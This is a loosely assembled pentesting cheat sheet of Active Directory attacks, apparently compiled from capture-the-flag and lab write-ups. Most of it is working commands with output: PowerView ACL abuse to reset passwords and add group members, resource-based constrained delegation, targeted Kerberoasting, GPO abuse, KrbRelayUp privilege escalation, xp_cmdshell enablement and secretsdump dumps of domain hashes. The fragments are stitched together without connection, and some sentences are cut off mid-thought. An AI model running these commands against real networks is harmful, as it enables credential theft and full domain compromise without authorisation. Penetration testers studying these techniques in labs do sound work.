#update time
ntpdate IP_DC
rdate -n IP_DC
ntpdate -v pool.ntp.org
NetBIOS - 139/445
query the NetBios name service for valide name
sudo nbtscan -r 192.168.50.0/24
Doing NBT name scan for addresses from 192.168.50.0/24
IP address NetBIOS Name Server User MAC address
------------------------------------------------------------------------------
192.168.50.124 SAMBA <server> SAMBA 00:00:00:00:00:00
192.168.50.134 SAMBAWEB <server> SAMBAWEB 00:00:00:00:00:00
...
By default, typical RID cycle attacks go up to RID 4000. For a larger domain, it may be necessary to expand that, so I’ll switch to lookupsid.py (though netexec works as well by adding the max number to the option like --rid-brute 10000)
smbpasswd -r 10.10.88.63 -U "Caroline.Robinson"
Old SMB password:
New SMB password:
Retype new SMB password:
Password changed for user Caroline.Robinson
means that mayrosec/Sales have GenericAll over Engineering users
#converting user to SID
$sid=Convert-NameToSid "Hacker_user"
=> this user suppose have a bad gpo and we want to dermine which ACls that he has
#enumerate GPO user
Get-DomainGPO | Get-ObjectAcl | ?{$_.SecurityIdentifier -eq $sid}
=> go to bloodhound to determine this gpo which object is linked
Force Change password
powerview
#login as user support
powerview blackfield.local/support:'passwordHere'@10.10.10.192 --dc-ip 10.10.10.192 -d --use-ldap
#changing password of user AUDIT2020
(LDAP)-[DC01.BLACKFIELD.local]-[BLACKFIELD\support]
PV > Set-DomainUserPassword -Identity AUDIT2020 -AccountPassword "passwordHere"
#abuse WriteOwner
Set-DomainObjectOwner -TargetIdentity claire -PrincipalIdentity tom
#add ResetPassword acl for claire user
Add-DomainObjectAcl -TargetIdentity claire -PrincipalIdentity tom -Rights ResetPassword
#change claire user password
Set-DomainUserPassword -Identity claire -AccountPassword "1ts-mag1c!!"
WriteDacl
powerview
abusing WriteDacl to add uses in group
#abuse writedact by adding write member acl to user claire
Add-DomainObjectAcl -TargetIdentity "BACKUP_ADMINS" -Rights WriteMembers -PrincipalIdentity claire
#add user tom to backup_admin groups
Add-DomainGroupMember -Identity 'BACKUP_ADMINS' -Members 'tom'
#check if tom user was added
Get-DomainGroupMember -Identity 'BACKUP_ADMINS'
abusing WriteDacl to change password
#abuse writedact by adding all permissions acl to user claire
Add-DomainObjectAcl -TargetIdentity "BACKUP_ADMINS" -Rights All -PrincipalIdentity claire
#changing password
$UserPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
Set-DomainUserPassword -Identity GPOADM -AccountPassword $UserPassword
impacket-getST -spn 'cifs/resourcedc.resourced.local' -impersonate 'Administrator' 'resourced.local/Arrack$:Password123'
#export his ticket
export KRB5CCNAME=./Administrator.ccache
#authenticate with his ticket
sudo impacket-psexec -k -no-pass resourcedc.resourced.local -dc-ip 192.168.167.175
#dumping ntds
impacket-secretsdump -k -no-pass resourcedc.resourced.local -dc-ip 192.168.231.175
AllowedToActOnBehalfOfOtherIdentity
This privilege essentially allows us to act on behalf of the domain controller, and request for service tickets on behalf of that domain computer. This privilege in particular allows us to exploit RBCD (resource-based constrained delegation), which can allow us to compromise the domain controller. We’ve done this exploit in the past on other machines, and it seems as though this is the same type of attack path here.
check MAQ value if we have the ability to create a machine in the domain
crackmapexec ldap 10.10.103.169 -u crose -p 'Password123@' -M maq
SMB 10.10.103.169 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:phantom.vl) (signing:True) (SMBv1:False)
LDAP 10.10.103.169 389 DC [+] phantom.vl\crose:Password123@
MAQ 10.10.103.169 389 DC [*] Getting the MachineAccountQuota
MAQ 10.10.103.169 389 DC MachineAccountQuota: 0
RBCD Through SPN-less User
At a low-level, if we are able to obtain the ticket session key and change that key to be the password hash of our controlled user, we can utilize User-2-User authentication to trick the DC into delegating a service ticket to us. We can combine both U2U and S4U2Proxy to obtain this ticket, and then use it to dump the LSA secrets of the domain controller. This is due to how the KDC interprets ticket session keys that are passed in as NT hashes for a user, allowing them to be treated as computer objects in a sense.
So to start, we’ll get the current TGT of the user in order to discover the ticket session key.
impacket-getTGT -hashes :$(pypykatz crypto nt 'Password123@') phantom.vl/crose
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[*] Saving ticket in crose.ccache
Now let’s change the user’s password once more to match the hash of the ticket session key that we just received.
impacket-smbpasswd -newhashes :4abd87ab347a96df9a497689a79bfd5c phantom.vl/crose:'Password123@'@dc.phantom.vl
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
===============================================================================
Warning: This functionality will be deprecated in the next Impacket version
===============================================================================
[*] NTLM hashes were changed successfully.
Now that the NTLM hash was set with the same value of our ticket session key, we should be able to use RBCD as intended.
impacket-rbcd -delegate-from 'crose' -delegate-to 'DC$' -dc-ip 10.10.103.169 -action 'write' 'phantom.vl'/'crose' -hashes :4abd87ab347a96df9a497689a79bfd5c
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[*] Attribute msDS-AllowedToActOnBehalfOfOtherIdentity is empty
[*] Delegation rights modified successfully!
[*] crose can now impersonate users on DC$ via S4U2Proxy
[*] Accounts allowed to act on behalf of other identity:
[*] crose (S-1-5-21-4029599044-1972224926-2225194048-1126)
Now that the account is able to delegate on behalf of the DC, we can request a service ticket as we normally would with our controlled user. The only difference here is that we’ll use the -u2u option so that the KDC interprets our login attempt as a domain user authentication attempt. We’ll also impersonate the Administrator account so that we can dump the secrets of the domain controller.
export KRB5CCNAME=Administrator@cifs_dc.phantom.vl@PHANTOM.VL.ccache
└─$ impacket-secretsdump -k dc.phantom.vl
......
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:[...snip...]:::
Recycle Bin Group Abuse
#filtering only deleted objects with the isDeleted propert
Get-ADObject -ldapfilter "(&(isDeleted=TRUE))" -IncludeDeletedObjects
#filter can be appplied to retrieve user account only by using objectclass property
Get-ADObject -ldapfilter "(&(objectclass=user)(isDeleted=TRUE))" -IncludeDeletedObjects
#set specific account user to display more information and properties
Get-ADObject -ldapfilter "(&(objectclass=user)(DisplayName=TempAdmin) (isDeleted=TRUE))" -IncludeDeletedObjects -Properties *
#retreive all deleted expext object (group,users,..)
Get-ADObject -filter 'isdeleted -eq $true -and name -ne "Deleted Objects"' -includeDeletedObjects -property *
#restor deleted objects,creating new CN but samaccount will be the same
restore-adobject -identity <ObjectGUID> -newname liza.deleted
GenericWrite
#authenticate
python3 /opt/powerview.py/powerview.py MEGACORP/sbauer:'D3veL0pM3nT!'@10.10.10.179 --dc-ip 10.10.10.179 -d --use-ldap
#set iser JORDEN as SPN
#set tatget user "jorden" as SPN service to get his TGT and crack it
Set-DomainObject -Identity "JORDEN" -Set "serviceprincipalname=http/BLAHBLAH"
#get TGT ticket of user "jorden"
python3 targetedKerberoast.py -v -d 'MEGACORP.LOCAL' -u 'sbauer' -p 'D3veL0pM3nT!'
[*] Starting kerberoast attacks
[*] Fetching usernames from Active Directory with LDAP
[VERBOSE] SPN added successfully for (jorden)
[+] Printing hash for (jorden)
without protocol transition, the service can only access resources on the delegated server as the original user and that means that we wouldn’t be able to abuse this just by requesting a ticket with getST from Impacket.
Abusing GPOs
support we have WriteDacl on Default Domain Policy gpo
using SharpGPOAbuse
.\SharpGPOAbuse.exe --AddLocalAdmin --UserAccount charlotte --GPOName "DEFAULT DOMAIN POLICY"
[+] Domain = secura.yzx
[+] Domain Controller = dc01.secura.yzx
[+] Distinguished Name = CN=Policies,CN=System,DC=secura,DC=yzx
[+] SID Value of charlotte = S-1-5-21-3453094141-4163309614-2941200192-1104
[+] GUID of "DEFAULT DOMAIN POLICY" is: {31B2F340-016D-11D2-945F-00C04FB984F9}
[+] File exists: \\secura.yzx\SysVol\secura.yzx\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\Machine\Microsoft\Windows NT\SecEdit\GptTmpl.inf
[+] The GPO does not specify any group memberships.
[+] versionNumber attribute changed successfully
[+] The version number in GPT.ini was increased successfully.
[+] The GPO was modified to include a new local admin. Wait for the GPO refresh cycle.
[+] Done!
#to fors the update
gpupdate /force
To use NtlmrelayAttack that ntlmhash user we relay it to the target machine should be and admin local there if not we cannot execute command instead we can got just an semi smb interactive shell like the example bellow in the image
Howerver, we get rpc access denied error and code execution is not succeeded. This is because the svc_web_staging user isn’t a local administrator on the target host. Despite the direct code execution isn’t successful, we can still try accessing the SMB shares on the dc01 host in the context of svc_web_staging user.
Furthermore, the LDAP does not have signing enabled. This cements the fact that a Kerberos relay attack is possible through KrbRelayUp.
nxc ldap 10.10.73.8 -u 'svc_scan' -p '[...snip...]' -M ldap-checker
SMB 10.10.73.8 445 BRUNODC [*] Windows Server 2022 Build 20348 x64 (name:BRUNODC) (domain:bruno.vl) (signing:True) (SMBv1:False)
LDAP 10.10.73.8 389 BRUNODC [+] bruno.vl\svc_scan:[...snip...]
LDAP-CHE... 10.10.73.8 389 BRUNODC LDAP Signing NOT Enforced!
LDAP-CHE... 10.10.73.8 389 BRUNODC LDAPS Channel Binding is set to "NEVER"
A Kerberos relay attack is essentially an authentication attack much like NTLM relay that allows us to relay a domain objects Kerberos authentication to another service. This essentially allows us to relay an ASREQ to any SPN that we need to authenticate to. Where LDAP signing essentially plays a picture into this is that it will encrypt all traffic over LDAP, meaning we won’t be able to properly sniff the traffic for authentication tokens as a MITM
So once we have the KrbRelayUp binary compiled, we’ll execute it on the target machine using the CLSID that we have selected.
PS C:\temp> .\KrbRelayUp.exe relay -Domain bruno.vl -CreateNewComputerAccount -ComputerName daz$ -ComputerPassword Password123@ --clsid d99e6e73-fc88-11d0-b498-00a0c90312f3
.\KrbRelayUp.exe relay -Domain bruno.vl -CreateNewComputerAccount -ComputerName daz$ -ComputerPassword Password123@ --clsid d99e6e73-fc88-11d0-b498-00a0c90312f3
KrbRelayUp - Relaying you to SYSTEM
[+] Rewriting function table
[+] Rewriting PEB
[+] Init COM server
[+] Computer account "daz$" added with password "Password123@"
[+] Looking for available ports..
[+] Port 2869 available
[+] Register COM server
[+] Forcing SYSTEM authentication
[+] Got Krb Auth from NT/SYSTEM. Relying to LDAP now...
[+] LDAP session established
[+] RBCD rights added successfully
[+] Run the spawn method for SYSTEM shell:
./KrbRelayUp.exe spawn -m rbcd -d bruno.vl -dc brunodc.bruno.vl -cn daz$ -cp Password123@
We’ll then execute the command provided so that a TGT request can be sent to the KDC. This allows us to use getST after this command to retrieve a TGS on behalf of the Administrator account to CIFS using our fake machine account.
export KRB5CCNAME=Administrator@cifs_brunodc.bruno.vl@BRUNO.VL.ccache
impacket-secretsdump -k brunodc.bruno.vl
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0xf58ac639976f0c99c2dde0d24ef3219d
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
......
Administrator:500:aad3b435b51404eeaad3b435b51404ee:13735[...snip...]bfd4:::
#enumerate all object class on AD
python3 windapsearch.py -d htb.local --dc-ip 10.10.10.161 --custom "objectClass=*"
#retrieve a list of users
python3 windapsearch.py -d resolute.megabank.local --dc-ip 10.10.10.169 -U > users
#check password stored in descriptions or other fields
windapsearch.py -d resolute.megabank.local --dc-ip 10.10.10.169 -U --full
SELECT distinct b.name FROM sys.server_permissions a INNER JOIN sys.server_principals b ON a.grantor_principal_id = b.principal_id WHERE a.permission_name = 'IMPERSONATE';
linked database:
select srvname from master..sysservers
srvname
--------------------------------------------------------------------------------
FALCONSQL
WANDASQL
#check if we are admin
select * from openquery("WANDASQL", 'SELECT is_srvrolemember(''sysadmin'')')
--------------------------------------------------------------------
0
list directories
xp_dirtree \
xp_dirtree \inetpub\wwwroot
Commands
#display version
SELECT @@version;
#display databases
SELECT name FROM sys.databases;
#display tables
SELECT * FROM offsec.information_schema.tables;
## Manual Code Execution
EXECUTE sp_configure 'show advanced options', 1;
RECONFIGURE;
EXECUTE sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
EXECUTE xp_cmdshell 'whoami';
Creating a TGT to impersonate administrator
So there are a few things that we’ll need to perform this, notably:
We can then use to obtain the ticket session key based on the service ticket for this user.
generating ntlm hash with password with this online
In particular, the CLSID I picked was d99e6e73-fc88-11d0-b498-00a0c90312f3. We’ll need to compile in order to exploit this on the target machine. Luckily enough, Defender is not enabled on this box so we shouldn’t have to bypass AV for this.
